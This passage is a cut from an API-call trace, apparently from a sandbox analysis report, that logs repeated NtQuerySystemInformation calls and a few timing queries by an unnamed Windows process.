(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x38, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x20, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.570] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a67fdac0 | out: lpSystemTimeAsFileTime=0xf7a67fdac0*(dwLowDateTime=0xfdf5059, dwHighDateTime=0x1d63874)) [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb78, Length=0x50, ResultLength=0x0) [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x28, ResultLength=0x0) [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c8, Length=0x50, ResultLength=0x0) [0210.570] GetTickCount () returned 0x1175287 [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd898, Length=0x58, ResultLength=0x0) [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x28, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0210.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0210.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x20, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x20, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd898, Length=0x58, ResultLength=0x0) [0210.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0210.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x28, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0210.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0210.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0210.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0210.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0210.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0210.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0210.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd898, Length=0x58, ResultLength=0x0) [0210.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x58, ResultLength=0x0) [0210.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x28, ResultLength=0x0) [0210.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0210.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0210.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0210.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0210.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x58, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x28, ResultLength=0x0) [0210.759] 